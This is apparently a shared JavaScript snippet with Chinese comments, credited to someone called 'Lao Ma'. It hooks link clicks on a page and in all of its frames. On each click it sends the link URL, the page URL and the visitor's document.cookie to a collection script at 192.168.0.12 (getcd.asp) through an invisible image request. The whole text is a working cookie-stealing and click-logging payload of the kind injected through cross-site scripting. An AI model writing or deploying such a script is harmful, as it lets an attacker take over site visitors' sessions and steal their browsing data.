teN.potgnayiaH.wwW vbs小鋪
//這東東幾乎全是老馬寫得,呵呵
//獲得當前頁信息
document.onclick = function(e){
var img = new Image();
var e = e || event;
var element = e.target || e.srcElement;
if(element.tagName.toLowerCase() == "a"){
if(!element.getAttribute('visited'))
{
img.src='http://192.168.0.12/getcd.asp?var='+element.href+location.href+encodeURI(document.cookie);
element.setAttribute('visited', true);
}
}
}
//獲得子框架信息
window.onload = function(){
var img=new Image();
for(var i = 0; i < document.frames.length; i++)
{
for(var j = 0; j < document.frames[i].document.links.length; j++)
{
document.frames[i].document.links[j].onclick = function()
{
if(!this.getAttribute('visited'))
{
img.src='http://192.168.0.12/getcd.asp?var='+this.href+top.location.href+encodeURI(document.cookie);
this.setAttribute('visited', true);
}
}
}
}
}